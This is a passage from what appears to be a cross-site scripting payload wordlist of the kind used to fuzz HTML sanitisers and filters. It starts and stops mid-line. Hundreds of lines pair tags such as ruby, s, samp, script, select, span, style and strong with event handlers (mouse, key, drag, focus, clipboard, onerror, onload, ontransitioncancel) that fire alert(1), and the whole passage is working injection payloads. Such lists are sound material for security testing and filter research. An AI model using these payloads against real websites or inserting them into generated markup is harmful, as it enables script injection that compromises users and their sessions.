contenteditable>test</ruby> +<ruby onkeyup="alert(1)" contenteditable>test</ruby> +<ruby onmousedown="alert(1)">test</ruby> +<ruby onmouseenter="alert(1)">test</ruby> +<ruby onmouseleave="alert(1)">test</ruby> +<ruby onmousemove="alert(1)">test</ruby> +<ruby onmouseout="alert(1)">test</ruby> +<ruby onmouseover="alert(1)">test</ruby> +<ruby onmouseup="alert(1)">test</ruby> +<ruby onpaste="alert(1)" contenteditable>test</ruby> +<s draggable="true" ondrag="alert(1)">test</s> +<s draggable="true" ondragend="alert(1)">test</s> +<s draggable="true" ondragenter="alert(1)">test</s> +<s draggable="true" ondragleave="alert(1)">test</s> +<s draggable="true" ondragstart="alert(1)">test</s> +<s id=x tabindex=1 onactivate=alert(1)></s> +<s id=x tabindex=1 onbeforeactivate=alert(1)></s> +<s id=x tabindex=1 onbeforedeactivate=alert(1)></s><input autofocus> +<s id=x tabindex=1 ondeactivate=alert(1)></s><input id=y autofocus> +<s id=x tabindex=1 onfocus=alert(1)></s> +<s id=x tabindex=1 onfocusin=alert(1)></s> +<s onbeforecopy="alert(1)" contenteditable>test</s> +<s onbeforecut="alert(1)" contenteditable>test</s> +<s onbeforepaste="alert(1)" contenteditable>test</s> +<s onblur=alert(1) tabindex=1 id=x></s><input autofocus> +<s onclick="alert(1)">test</s> +<s oncontextmenu="alert(1)">test</s> +<s oncopy="alert(1)" contenteditable>test</s> +<s oncut="alert(1)" contenteditable>test</s> +<s ondblclick="alert(1)">test</s> +<s onfocusout=alert(1) tabindex=1 id=x></s><input autofocus> +<s onkeydown="alert(1)" contenteditable>test</s> +<s onkeypress="alert(1)" contenteditable>test</s> +<s onkeyup="alert(1)" contenteditable>test</s> +<s onmousedown="alert(1)">test</s> +<s onmouseenter="alert(1)">test</s> +<s onmouseleave="alert(1)">test</s> +<s onmousemove="alert(1)">test</s> +<s onmouseout="alert(1)">test</s> +<s onmouseover="alert(1)">test</s> +<s onmouseup="alert(1)">test</s> +<s onpaste="alert(1)" contenteditable>test</s> +<samp draggable="true" ondrag="alert(1)">test</samp> +<samp draggable="true" ondragend="alert(1)">test</samp> +<samp draggable="true" ondragenter="alert(1)">test</samp> +<samp draggable="true" ondragleave="alert(1)">test</samp> +<samp draggable="true" ondragstart="alert(1)">test</samp> +<samp id=x tabindex=1 onactivate=alert(1)></samp> +<samp id=x tabindex=1 onbeforeactivate=alert(1)></samp> +<samp id=x tabindex=1 onbeforedeactivate=alert(1)></samp><input autofocus> +<samp id=x tabindex=1 ondeactivate=alert(1)></samp><input id=y autofocus> +<samp id=x tabindex=1 onfocus=alert(1)></samp> +<samp id=x tabindex=1 onfocusin=alert(1)></samp> +<samp onbeforecopy="alert(1)" contenteditable>test</samp> +<samp onbeforecut="alert(1)" contenteditable>test</samp> +<samp onbeforepaste="alert(1)" contenteditable>test</samp> +<samp onblur=alert(1) tabindex=1 id=x></samp><input autofocus> +<samp onclick="alert(1)">test</samp> +<samp oncontextmenu="alert(1)">test</samp> +<samp oncopy="alert(1)" contenteditable>test</samp> +<samp oncut="alert(1)" contenteditable>test</samp> +<samp ondblclick="alert(1)">test</samp> +<samp onfocusout=alert(1) tabindex=1 id=x></samp><input autofocus> +<samp onkeydown="alert(1)" contenteditable>test</samp> +<samp onkeypress="alert(1)" contenteditable>test</samp> +<samp onkeyup="alert(1)" contenteditable>test</samp> +<samp onmousedown="alert(1)">test</samp> +<samp onmouseenter="alert(1)">test</samp> +<samp onmouseleave="alert(1)">test</samp> +<samp onmousemove="alert(1)">test</samp> +<samp onmouseout="alert(1)">test</samp> +<samp onmouseover="alert(1)">test</samp> +<samp onmouseup="alert(1)">test</samp> +<samp onpaste="alert(1)" contenteditable>test</samp> +<script draggable="true" ondrag="alert(1)">test</script> +<script draggable="true" ondragend="alert(1)">test</script> +<script draggable="true" ondragenter="alert(1)">test</script> +<script draggable="true" ondragleave="alert(1)">test</script> +<script draggable="true" ondragstart="alert(1)">test</script> +<script id=x tabindex=1 onactivate=alert(1)></script> +<script id=x tabindex=1 onbeforeactivate=alert(1)></script> +<script id=x tabindex=1 onbeforedeactivate=alert(1)></script><input autofocus> +<script id=x tabindex=1 ondeactivate=alert(1)></script><input id=y autofocus> +<script id=x tabindex=1 onfocus=alert(1)></script> +<script id=x tabindex=1 onfocusin=alert(1)></script> +<script onbeforecopy="alert(1)" contenteditable>test</script> +<script onbeforecut="alert(1)" contenteditable>test</script> +<script onbeforepaste="alert(1)" contenteditable>test</script> +<script onblur=alert(1) tabindex=1 id=x></script><input autofocus> +<script onclick="alert(1)">test</script> +<script oncontextmenu="alert(1)">test</script> +<script oncopy="alert(1)" contenteditable>test</script> +<script oncut="alert(1)" contenteditable>test</script> +<script ondblclick="alert(1)">test</script> +<script onerror=alert(1) src=/></script> +<script onfocusout=alert(1) tabindex=1 id=x></script><input autofocus> +<script onkeydown="alert(1)" contenteditable>test</script> +<script onkeypress="alert(1)" contenteditable>test</script> +<script onkeyup="alert(1)" contenteditable>test</script> +<script onload=alert(1) src=validjs.js></script> +<script onmousedown="alert(1)">test</script> +<script onmouseenter="alert(1)">test</script> +<script onmouseleave="alert(1)">test</script> +<script onmousemove="alert(1)">test</script> +<script onmouseout="alert(1)">test</script> +<script onmouseover="alert(1)">test</script> +<script onmouseup="alert(1)">test</script> +<script onpaste="alert(1)" contenteditable>test</script> +<script onreadystatechange=alert(1)></script> +<section draggable="true" ondrag="alert(1)">test</section> +<section draggable="true" ondragend="alert(1)">test</section> +<section draggable="true" ondragenter="alert(1)">test</section> +<section draggable="true" ondragleave="alert(1)">test</section> +<section draggable="true" ondragstart="alert(1)">test</section> +<section id=x tabindex=1 onactivate=alert(1)></section> +<section id=x tabindex=1 onbeforeactivate=alert(1)></section> +<section id=x tabindex=1 onbeforedeactivate=alert(1)></section><input autofocus> +<section id=x tabindex=1 ondeactivate=alert(1)></section><input id=y autofocus> +<section id=x tabindex=1 onfocus=alert(1)></section> +<section id=x tabindex=1 onfocusin=alert(1)></section> +<section onbeforecopy="alert(1)" contenteditable>test</section> +<section onbeforecut="alert(1)" contenteditable>test</section> +<section onbeforepaste="alert(1)" contenteditable>test</section> +<section onblur=alert(1) tabindex=1 id=x></section><input autofocus> +<section onclick="alert(1)">test</section> +<section oncontextmenu="alert(1)">test</section> +<section oncopy="alert(1)" contenteditable>test</section> +<section oncut="alert(1)" contenteditable>test</section> +<section ondblclick="alert(1)">test</section> +<section onfocusout=alert(1) tabindex=1 id=x></section><input autofocus> +<section onkeydown="alert(1)" contenteditable>test</section> +<section onkeypress="alert(1)" contenteditable>test</section> +<section onkeyup="alert(1)" contenteditable>test</section> +<section onmousedown="alert(1)">test</section> +<section onmouseenter="alert(1)">test</section> +<section onmouseleave="alert(1)">test</section> +<section onmousemove="alert(1)">test</section> +<section onmouseout="alert(1)">test</section> +<section onmouseover="alert(1)">test</section> +<section onmouseup="alert(1)">test</section> +<section onpaste="alert(1)" contenteditable>test</section> +<select autofocus onfocus=alert(1)> +<select autofocus onfocusin=alert(1)> +<select draggable="true" ondrag="alert(1)">test</select> +<select draggable="true" ondragend="alert(1)">test</select> +<select draggable="true" ondragenter="alert(1)">test</select> +<select draggable="true" ondragleave="alert(1)">test</select> +<select draggable="true" ondragstart="alert(1)">test</select> +<select id=x tabindex=1 onactivate=alert(1)></select> +<select id=x tabindex=1 onbeforeactivate=alert(1)></select> +<select id=x tabindex=1 onbeforedeactivate=alert(1)></select><input autofocus> +<select id=x tabindex=1 ondeactivate=alert(1)></select><input id=y autofocus> +<select onbeforecopy="alert(1)" contenteditable>test</select> +<select onbeforecut="alert(1)" contenteditable>test</select> +<select onbeforepaste="alert(1)" contenteditable>test</select> +<select onblur=alert(1) id=x></select><input autofocus> +<select onchange=alert(1)><option>change me</option><option>XSS</option></select> +<select onclick="alert(1)">test</select> +<select oncontextmenu="alert(1)">test</select> +<select oncopy="alert(1)" contenteditable>test</select> +<select oncut="alert(1)" contenteditable>test</select> +<select ondblclick="alert(1)">test</select> +<select onfocusout=alert(1) id=x></select><input autofocus> +<select onkeydown="alert(1)" contenteditable>test</select> +<select onkeypress="alert(1)" contenteditable>test</select> +<select onkeyup="alert(1)" contenteditable>test</select> +<select onmousedown="alert(1)">test</select> +<select onmouseenter="alert(1)">test</select> +<select onmouseleave="alert(1)">test</select> +<select onmousemove="alert(1)">test</select> +<select onmouseout="alert(1)">test</select> +<select onmouseover="alert(1)">test</select> +<select onmouseup="alert(1)">test</select> +<select onpaste="alert(1)" contenteditable>test</select> +<shadow draggable="true" ondrag="alert(1)">test</shadow> +<shadow draggable="true" ondragend="alert(1)">test</shadow> +<shadow draggable="true" ondragenter="alert(1)">test</shadow> +<shadow draggable="true" ondragleave="alert(1)">test</shadow> +<shadow draggable="true" ondragstart="alert(1)">test</shadow> +<shadow id=x tabindex=1 onactivate=alert(1)></shadow> +<shadow id=x tabindex=1 onbeforeactivate=alert(1)></shadow> +<shadow id=x tabindex=1 onbeforedeactivate=alert(1)></shadow><input autofocus> +<shadow id=x tabindex=1 ondeactivate=alert(1)></shadow><input id=y autofocus> +<shadow id=x tabindex=1 onfocus=alert(1)></shadow> +<shadow id=x tabindex=1 onfocusin=alert(1)></shadow> +<shadow onbeforecopy="alert(1)" contenteditable>test</shadow> +<shadow onbeforecut="alert(1)" contenteditable>test</shadow> +<shadow onbeforepaste="alert(1)" contenteditable>test</shadow> +<shadow onblur=alert(1) tabindex=1 id=x></shadow><input autofocus> +<shadow onclick="alert(1)">test</shadow> +<shadow oncontextmenu="alert(1)">test</shadow> +<shadow oncopy="alert(1)" contenteditable>test</shadow> +<shadow oncut="alert(1)" contenteditable>test</shadow> +<shadow ondblclick="alert(1)">test</shadow> +<shadow onfocusout=alert(1) tabindex=1 id=x></shadow><input autofocus> +<shadow onkeydown="alert(1)" contenteditable>test</shadow> +<shadow onkeypress="alert(1)" contenteditable>test</shadow> +<shadow onkeyup="alert(1)" contenteditable>test</shadow> +<shadow onmousedown="alert(1)">test</shadow> +<shadow onmouseenter="alert(1)">test</shadow> +<shadow onmouseleave="alert(1)">test</shadow> +<shadow onmousemove="alert(1)">test</shadow> +<shadow onmouseout="alert(1)">test</shadow> +<shadow onmouseover="alert(1)">test</shadow> +<shadow onmouseup="alert(1)">test</shadow> +<shadow onpaste="alert(1)" contenteditable>test</shadow> +<slot draggable="true" ondrag="alert(1)">test</slot> +<slot draggable="true" ondragend="alert(1)">test</slot> +<slot draggable="true" ondragenter="alert(1)">test</slot> +<slot draggable="true" ondragleave="alert(1)">test</slot> +<slot draggable="true" ondragstart="alert(1)">test</slot> +<slot id=x tabindex=1 onactivate=alert(1)></slot> +<slot id=x tabindex=1 onbeforeactivate=alert(1)></slot> +<slot id=x tabindex=1 onbeforedeactivate=alert(1)></slot><input autofocus> +<slot id=x tabindex=1 ondeactivate=alert(1)></slot><input id=y autofocus> +<slot id=x tabindex=1 onfocus=alert(1)></slot> +<slot id=x tabindex=1 onfocusin=alert(1)></slot> +<slot onbeforecopy="alert(1)" contenteditable>test</slot> +<slot onbeforecut="alert(1)" contenteditable>test</slot> +<slot onbeforepaste="alert(1)" contenteditable>test</slot> +<slot onblur=alert(1) tabindex=1 id=x></slot><input autofocus> +<slot onclick="alert(1)">test</slot> +<slot oncontextmenu="alert(1)">test</slot> +<slot oncopy="alert(1)" contenteditable>test</slot> +<slot oncut="alert(1)" contenteditable>test</slot> +<slot ondblclick="alert(1)">test</slot> +<slot onfocusout=alert(1) tabindex=1 id=x></slot><input autofocus> +<slot onkeydown="alert(1)" contenteditable>test</slot> +<slot onkeypress="alert(1)" contenteditable>test</slot> +<slot onkeyup="alert(1)" contenteditable>test</slot> +<slot onmousedown="alert(1)">test</slot> +<slot onmouseenter="alert(1)">test</slot> +<slot onmouseleave="alert(1)">test</slot> +<slot onmousemove="alert(1)">test</slot> +<slot onmouseout="alert(1)">test</slot> +<slot onmouseover="alert(1)">test</slot> +<slot onmouseup="alert(1)">test</slot> +<slot onpaste="alert(1)" contenteditable>test</slot> +<small draggable="true" ondrag="alert(1)">test</small> +<small draggable="true" ondragend="alert(1)">test</small> +<small draggable="true" ondragenter="alert(1)">test</small> +<small draggable="true" ondragleave="alert(1)">test</small> +<small draggable="true" ondragstart="alert(1)">test</small> +<small id=x tabindex=1 onactivate=alert(1)></small> +<small id=x tabindex=1 onbeforeactivate=alert(1)></small> +<small id=x tabindex=1 onbeforedeactivate=alert(1)></small><input autofocus> +<small id=x tabindex=1 ondeactivate=alert(1)></small><input id=y autofocus> +<small id=x tabindex=1 onfocus=alert(1)></small> +<small id=x tabindex=1 onfocusin=alert(1)></small> +<small onbeforecopy="alert(1)" contenteditable>test</small> +<small onbeforecut="alert(1)" contenteditable>test</small> +<small onbeforepaste="alert(1)" contenteditable>test</small> +<small onblur=alert(1) tabindex=1 id=x></small><input autofocus> +<small onclick="alert(1)">test</small> +<small oncontextmenu="alert(1)">test</small> +<small oncopy="alert(1)" contenteditable>test</small> +<small oncut="alert(1)" contenteditable>test</small> +<small ondblclick="alert(1)">test</small> +<small onfocusout=alert(1) tabindex=1 id=x></small><input autofocus> +<small onkeydown="alert(1)" contenteditable>test</small> +<small onkeypress="alert(1)" contenteditable>test</small> +<small onkeyup="alert(1)" contenteditable>test</small> +<small onmousedown="alert(1)">test</small> +<small onmouseenter="alert(1)">test</small> +<small onmouseleave="alert(1)">test</small> +<small onmousemove="alert(1)">test</small> +<small onmouseout="alert(1)">test</small> +<small onmouseover="alert(1)">test</small> +<small onmouseup="alert(1)">test</small> +<small onpaste="alert(1)" contenteditable>test</small> +<source draggable="true" ondrag="alert(1)">test</source> +<source draggable="true" ondragend="alert(1)">test</source> +<source draggable="true" ondragenter="alert(1)">test</source> +<source draggable="true" ondragleave="alert(1)">test</source> +<source draggable="true" ondragstart="alert(1)">test</source> +<source id=x tabindex=1 onactivate=alert(1)></source> +<source id=x tabindex=1 onbeforeactivate=alert(1)></source> +<source id=x tabindex=1 onbeforedeactivate=alert(1)></source><input autofocus> +<source id=x tabindex=1 ondeactivate=alert(1)></source><input id=y autofocus> +<source id=x tabindex=1 onfocus=alert(1)></source> +<source id=x tabindex=1 onfocusin=alert(1)></source> +<source onbeforecopy="alert(1)" contenteditable>test</source> +<source onbeforecut="alert(1)" contenteditable>test</source> +<source onbeforepaste="alert(1)" contenteditable>test</source> +<source onblur=alert(1) tabindex=1 id=x></source><input autofocus> +<source onclick="alert(1)">test</source> +<source oncontextmenu="alert(1)">test</source> +<source oncopy="alert(1)" contenteditable>test</source> +<source oncut="alert(1)" contenteditable>test</source> +<source ondblclick="alert(1)">test</source> +<source onfocusout=alert(1) tabindex=1 id=x></source><input autofocus> +<source onkeydown="alert(1)" contenteditable>test</source> +<source onkeypress="alert(1)" contenteditable>test</source> +<source onkeyup="alert(1)" contenteditable>test</source> +<source onmousedown="alert(1)">test</source> +<source onmouseenter="alert(1)">test</source> +<source onmouseleave="alert(1)">test</source> +<source onmousemove="alert(1)">test</source> +<source onmouseout="alert(1)">test</source> +<source onmouseover="alert(1)">test</source> +<source onmouseup="alert(1)">test</source> +<source onpaste="alert(1)" contenteditable>test</source> +<spacer draggable="true" ondrag="alert(1)">test</spacer> +<spacer draggable="true" ondragend="alert(1)">test</spacer> +<spacer draggable="true" ondragenter="alert(1)">test</spacer> +<spacer draggable="true" ondragleave="alert(1)">test</spacer> +<spacer draggable="true" ondragstart="alert(1)">test</spacer> +<spacer id=x tabindex=1 onactivate=alert(1)></spacer> +<spacer id=x tabindex=1 onbeforeactivate=alert(1)></spacer> +<spacer id=x tabindex=1 onbeforedeactivate=alert(1)></spacer><input autofocus> +<spacer id=x tabindex=1 ondeactivate=alert(1)></spacer><input id=y autofocus> +<spacer id=x tabindex=1 onfocus=alert(1)></spacer> +<spacer id=x tabindex=1 onfocusin=alert(1)></spacer> +<spacer onbeforecopy="alert(1)" contenteditable>test</spacer> +<spacer onbeforecut="alert(1)" contenteditable>test</spacer> +<spacer onbeforepaste="alert(1)" contenteditable>test</spacer> +<spacer onblur=alert(1) tabindex=1 id=x></spacer><input autofocus> +<spacer onclick="alert(1)">test</spacer> +<spacer oncontextmenu="alert(1)">test</spacer> +<spacer oncopy="alert(1)" contenteditable>test</spacer> +<spacer oncut="alert(1)" contenteditable>test</spacer> +<spacer ondblclick="alert(1)">test</spacer> +<spacer onfocusout=alert(1) tabindex=1 id=x></spacer><input autofocus> +<spacer onkeydown="alert(1)" contenteditable>test</spacer> +<spacer onkeypress="alert(1)" contenteditable>test</spacer> +<spacer onkeyup="alert(1)" contenteditable>test</spacer> +<spacer onmousedown="alert(1)">test</spacer> +<spacer onmouseenter="alert(1)">test</spacer> +<spacer onmouseleave="alert(1)">test</spacer> +<spacer onmousemove="alert(1)">test</spacer> +<spacer onmouseout="alert(1)">test</spacer> +<spacer onmouseover="alert(1)">test</spacer> +<spacer onmouseup="alert(1)">test</spacer> +<spacer onpaste="alert(1)" contenteditable>test</spacer> +<span draggable="true" ondrag="alert(1)">test</span> +<span draggable="true" ondragend="alert(1)">test</span> +<span draggable="true" ondragenter="alert(1)">test</span> +<span draggable="true" ondragleave="alert(1)">test</span> +<span draggable="true" ondragstart="alert(1)">test</span> +<span id=x tabindex=1 onactivate=alert(1)></span> +<span id=x tabindex=1 onbeforeactivate=alert(1)></span> +<span id=x tabindex=1 onbeforedeactivate=alert(1)></span><input autofocus> +<span id=x tabindex=1 ondeactivate=alert(1)></span><input id=y autofocus> +<span id=x tabindex=1 onfocus=alert(1)></span> +<span id=x tabindex=1 onfocusin=alert(1)></span> +<span onbeforecopy="alert(1)" contenteditable>test</span> +<span onbeforecut="alert(1)" contenteditable>test</span> +<span onbeforepaste="alert(1)" contenteditable>test</span> +<span onblur=alert(1) tabindex=1 id=x></span><input autofocus> +<span onclick="alert(1)">test</span> +<span oncontextmenu="alert(1)">test</span> +<span oncopy="alert(1)" contenteditable>test</span> +<span oncut="alert(1)" contenteditable>test</span> +<span ondblclick="alert(1)">test</span> +<span onfocusout=alert(1) tabindex=1 id=x></span><input autofocus> +<span onkeydown="alert(1)" contenteditable>test</span> +<span onkeypress="alert(1)" contenteditable>test</span> +<span onkeyup="alert(1)" contenteditable>test</span> +<span onmousedown="alert(1)">test</span> +<span onmouseenter="alert(1)">test</span> +<span onmouseleave="alert(1)">test</span> +<span onmousemove="alert(1)">test</span> +<span onmouseout="alert(1)">test</span> +<span onmouseover="alert(1)">test</span> +<span onmouseup="alert(1)">test</span> +<span onpaste="alert(1)" contenteditable>test</span> +<strike draggable="true" ondrag="alert(1)">test</strike> +<strike draggable="true" ondragend="alert(1)">test</strike> +<strike draggable="true" ondragenter="alert(1)">test</strike> +<strike draggable="true" ondragleave="alert(1)">test</strike> +<strike draggable="true" ondragstart="alert(1)">test</strike> +<strike id=x tabindex=1 onactivate=alert(1)></strike> +<strike id=x tabindex=1 onbeforeactivate=alert(1)></strike> +<strike id=x tabindex=1 onbeforedeactivate=alert(1)></strike><input autofocus> +<strike id=x tabindex=1 ondeactivate=alert(1)></strike><input id=y autofocus> +<strike id=x tabindex=1 onfocus=alert(1)></strike> +<strike id=x tabindex=1 onfocusin=alert(1)></strike> +<strike onbeforecopy="alert(1)" contenteditable>test</strike> +<strike onbeforecut="alert(1)" contenteditable>test</strike> +<strike onbeforepaste="alert(1)" contenteditable>test</strike> +<strike onblur=alert(1) tabindex=1 id=x></strike><input autofocus> +<strike onclick="alert(1)">test</strike> +<strike oncontextmenu="alert(1)">test</strike> +<strike oncopy="alert(1)" contenteditable>test</strike> +<strike oncut="alert(1)" contenteditable>test</strike> +<strike ondblclick="alert(1)">test</strike> +<strike onfocusout=alert(1) tabindex=1 id=x></strike><input autofocus> +<strike onkeydown="alert(1)" contenteditable>test</strike> +<strike onkeypress="alert(1)" contenteditable>test</strike> +<strike onkeyup="alert(1)" contenteditable>test</strike> +<strike onmousedown="alert(1)">test</strike> +<strike onmouseenter="alert(1)">test</strike> +<strike onmouseleave="alert(1)">test</strike> +<strike onmousemove="alert(1)">test</strike> +<strike onmouseout="alert(1)">test</strike> +<strike onmouseover="alert(1)">test</strike> +<strike onmouseup="alert(1)">test</strike> +<strike onpaste="alert(1)" contenteditable>test</strike> +<strong draggable="true" ondrag="alert(1)">test</strong> +<strong draggable="true" ondragend="alert(1)">test</strong> +<strong draggable="true" ondragenter="alert(1)">test</strong> +<strong draggable="true" ondragleave="alert(1)">test</strong> +<strong draggable="true" ondragstart="alert(1)">test</strong> +<strong id=x tabindex=1 onactivate=alert(1)></strong> +<strong id=x tabindex=1 onbeforeactivate=alert(1)></strong> +<strong id=x tabindex=1 onbeforedeactivate=alert(1)></strong><input autofocus> +<strong id=x tabindex=1 ondeactivate=alert(1)></strong><input id=y autofocus> +<strong id=x tabindex=1 onfocus=alert(1)></strong> +<strong id=x tabindex=1 onfocusin=alert(1)></strong> +<strong onbeforecopy="alert(1)" contenteditable>test</strong> +<strong onbeforecut="alert(1)" contenteditable>test</strong> +<strong onbeforepaste="alert(1)" contenteditable>test</strong> +<strong onblur=alert(1) tabindex=1 id=x></strong><input autofocus> +<strong onclick="alert(1)">test</strong> +<strong oncontextmenu="alert(1)">test</strong> +<strong oncopy="alert(1)" contenteditable>test</strong> +<strong oncut="alert(1)" contenteditable>test</strong> +<strong ondblclick="alert(1)">test</strong> +<strong onfocusout=alert(1) tabindex=1 id=x></strong><input autofocus> +<strong onkeydown="alert(1)" contenteditable>test</strong> +<strong onkeypress="alert(1)" contenteditable>test</strong> +<strong onkeyup="alert(1)" contenteditable>test</strong> +<strong onmousedown="alert(1)">test</strong> +<strong onmouseenter="alert(1)">test</strong> +<strong onmouseleave="alert(1)">test</strong> +<strong onmousemove="alert(1)">test</strong> +<strong onmouseout="alert(1)">test</strong> +<strong onmouseover="alert(1)">test</strong> +<strong onmouseup="alert(1)">test</strong> +<strong onpaste="alert(1)" contenteditable>test</strong> +<style draggable="true" ondrag="alert(1)">test</style> +<style draggable="true" ondragend="alert(1)">test</style> +<style draggable="true" ondragenter="alert(1)">test</style> +<style draggable="true" ondragleave="alert(1)">test</style> +<style draggable="true" ondragstart="alert(1)">test</style> +<style id=x tabindex=1 onactivate=alert(1)></style> +<style id=x tabindex=1 onbeforeactivate=alert(1)></style> +<style id=x tabindex=1 onbeforedeactivate=alert(1)></style><input autofocus> +<style id=x tabindex=1 ondeactivate=alert(1)></style><input id=y autofocus> +<style id=x tabindex=1 onfocus=alert(1)></style> +<style id=x tabindex=1 onfocusin=alert(1)></style> +<style onbeforecopy="alert(1)" contenteditable>test</style> +<style onbeforecut="alert(1)" contenteditable>test</style> +<style onbeforepaste="alert(1)" contenteditable>test</style> +<style onblur=alert(1) tabindex=1 id=x></style><input autofocus> +<style onclick="alert(1)">test</style> +<style oncontextmenu="alert(1)">test</style> +<style oncopy="alert(1)" contenteditable>test</style> +<style oncut="alert(1)" contenteditable>test</style> +<style ondblclick="alert(1)">test</style> +<style onfocusout=alert(1) tabindex=1 id=x></style><input autofocus> +<style onkeydown="alert(1)" contenteditable>test</style> +<style onkeypress="alert(1)" contenteditable>test</style> +<style onkeyup="alert(1)" contenteditable>test</style> +<style onload=alert(1)></style> +<style onmousedown="alert(1)">test</style> +<style onmouseenter="alert(1)">test</style> +<style onmouseleave="alert(1)">test</style> +<style onmousemove="alert(1)">test</style> +<style onmouseout="alert(1)">test</style> +<style onmouseover="alert(1)">test</style> +<style onmouseup="alert(1)">test</style> +<style onpaste="alert(1)" contenteditable>test</style> +<style onreadystatechange=alert(1)></style> +<style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(1)></a> +<style>:target {color: red;}</style><abbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></abbr> +<style>:target {color: red;}</style><acronym id=x style="transition:color 10s" ontransitioncancel=alert(1)></acronym> +<style>:target {color: red;}</style><address id=x style="transition:color 10s" ontransitioncancel=alert(1)></address> +<style>:target {color: red;}</style><applet id=x style="transition:color 10s" ontransitioncancel=alert(1)></applet> +<style>:target {color: red;}</style><area id=x style="transition:color 10s" ontransitioncancel=alert(1)></area> +<style>:target {color: red;}</style><article id=x style="transition:color 10s" ontransitioncancel=alert(1)></article> +<style>:target {color: red;}</style><aside id=x style="transition:color 10s" ontransitioncancel=alert(1)></aside> +<style>:target {color: red;}</style><audio id=x style="transition:color 10s" ontransitioncancel=alert(1)></audio> +<style>:target {color: red;}</style><b id=x style="transition:color 10s" ontransitioncancel=alert(1)></b> +<style>:target {color: red;}</style><base id=x style="transition:color 10s" ontransitioncancel=alert(1)></base> +<style>:target {color: red;}</style><basefont id=x style="transition:color 10s" ontransitioncancel=alert(1)></basefont> +<style>:target {color: red;}</style><bdi id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdi> +<style>:target {color: red;}</style><bdo id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdo> +<style>:target {color: red;}</style><bgsound id=x style="transition:color 10s" ontransitioncancel=alert(1)></bgsound> +<style>:target {color: red;}</style><big id=x style="transition:color 10s" ontransitioncancel=alert(1)></big> +<style>:target {color: red;}</style><blink id=x style="transition:color 10s" ontransitioncancel=alert(1)></blink> +<style>:target {color: red;}</style><blockquote id=x style="transition:color 10s" ontransitioncancel=alert(1)></blockquote> +<style>:target {color: red;}</style><body id=x style="transition:color 10s" ontransitioncancel=alert(1)></body> +<style>:target {color: red;}</style><br id=x style="transition:color 10s" ontransitioncancel=alert(1)></br> +<style>:target {color: red;}</style><button id=x style="transition:color 10s" ontransitioncancel=alert(1)></button> +<style>:target {color: red;}</style><canvas id=x style="transition:color 10s" ontransitioncancel=alert(1)></canvas> +<style>:target {color: red;}</style><caption id=x style="transition:color 10s" ontransitioncancel=alert(1)></caption> +<style>:target {color: red;}</style><center id=x style="transition:color 10s" ontransitioncancel=alert(1)></center> +<style>:target {color: red;}</style><cite id=x style="transition:color 10s" ontransitioncancel=alert(1)></cite> +<style>:target {color: red;}</style><code id=x style="transition:color 10s" ontransitioncancel=alert(1)></code> +<style>:target {color: red;}</style><col id=x style="transition:color 10s" ontransitioncancel=alert(1)></col> +<style>:target {color: red;}</style><colgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></colgroup> +<style>:target {color: red;}</style><command id=x style="transition:color 10s" ontransitioncancel=alert(1)></command> +<style>:target {color: red;}</style><content id=x style="transition:color 10s" ontransitioncancel=alert(1)></content> +<style>:target {color: red;}</style><data id=x style="transition:color 10s" ontransitioncancel=alert(1)></data> +<style>:target {color: red;}</style><datalist id=x style="transition:color 10s" ontransitioncancel=alert(1)></datalist> +<style>:target {color: red;}</style><dd id=x style="transition:color 10s" ontransitioncancel=alert(1)></dd> +<style>:target {color: red;}</style><del id=x style="transition:color 10s" ontransitioncancel=alert(1)></del> +<style>:target {color: red;}</style><details id=x style="transition:color 10s" ontransitioncancel=alert(1)></details> +<style>:target {color: red;}</style><dfn id=x style="transition:color 10s" ontransitioncancel=alert(1)></dfn> +<style>:target {color: red;}</style><dialog id=x style="transition:color 10s" ontransitioncancel=alert(1)></dialog> +<style>:target {color: red;}</style><dir id=x style="transition:color 10s" ontransitioncancel=alert(1)></dir> +<style>:target {color: red;}</style><div id=x style="transition:color 10s" ontransitioncancel=alert(1)></div> +<style>:target {color: red;}</style><dl id=x style="transition:color 10s" ontransitioncancel=alert(1)></dl> +<style>:target {color: red;}</style><dt id=x style="transition:color 10s" ontransitioncancel=alert(1)></dt> +<style>:target {color: red;}</style><element id=x style="transition:color 10s" ontransitioncancel=alert(1)></element> +<style>:target {color: red;}</style><em id=x style="transition:color 10s" ontransitioncancel=alert(1)></em> +<style>:target {color: red;}</style><embed id=x style="transition:color 10s" ontransitioncancel=alert(1)></embed> +<style>:target {color: red;}</style><fieldset id=x style="transition:color 10s" ontransitioncancel=alert(1)></fieldset> +<style>:target {color: red;}</style><figcaption id=x style="transition:color 10s" ontransitioncancel=alert(1)></figcaption> +<style>:target {color: red;}</style><figure id=x style="transition:color 10s" ontransitioncancel=alert(1)></figure> +<style>:target {color: red;}</style><font id=x style="transition:color 10s" ontransitioncancel=alert(1)></font> +<style>:target {color: red;}</style><footer id=x style="transition:color 10s" ontransitioncancel=alert(1)></footer> +<style>:target {color: red;}</style><form id=x style="transition:color 10s" ontransitioncancel=alert(1)></form> +<style>:target {color: red;}</style><frame id=x style="transition:color 10s" ontransitioncancel=alert(1)></frame> +<style>:target {color: red;}</style><frameset id=x style="transition:color 10s" ontransitioncancel=alert(1)></frameset> +<style>:target {color: red;}</style><h1 id=x style="transition:color 10s" ontransitioncancel=alert(1)></h1> +<style>:target {color: red;}</style><head id=x style="transition:color 10s" ontransitioncancel=alert(1)></head> +<style>:target {color: red;}</style><header id=x style="transition:color 10s" ontransitioncancel=alert(1)></header> +<style>:target {color: red;}</style><hgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></hgroup> +<style>:target {color: red;}</style><hr id=x style="transition:color 10s" ontransitioncancel=alert(1)></hr> +<style>:target {color: red;}</style><html id=x style="transition:color 10s" ontransitioncancel=alert(1)></html> +<style>:target {color: red;}</style><i id=x style="transition:color 10s" ontransitioncancel=alert(1)></i> +<style>:target {color: red;}</style><iframe id=x style="transition:color 10s" ontransitioncancel=alert(1)></iframe> +<style>:target {color: red;}</style><image id=x style="transition:color 10s" ontransitioncancel=alert(1)></image> +<style>:target {color: red;}</style><img id=x style="transition:color 10s" ontransitioncancel=alert(1)></img> +<style>:target {color: red;}</style><input id=x style="transition:color 10s" ontransitioncancel=alert(1)></input> +<style>:target {color: red;}</style><ins id=x style="transition:color 10s" ontransitioncancel=alert(1)></ins> +<style>:target {color: red;}</style><isindex id=x style="transition:color 10s" ontransitioncancel=alert(1)></isindex> +<style>:target {color: red;}</style><kbd id=x 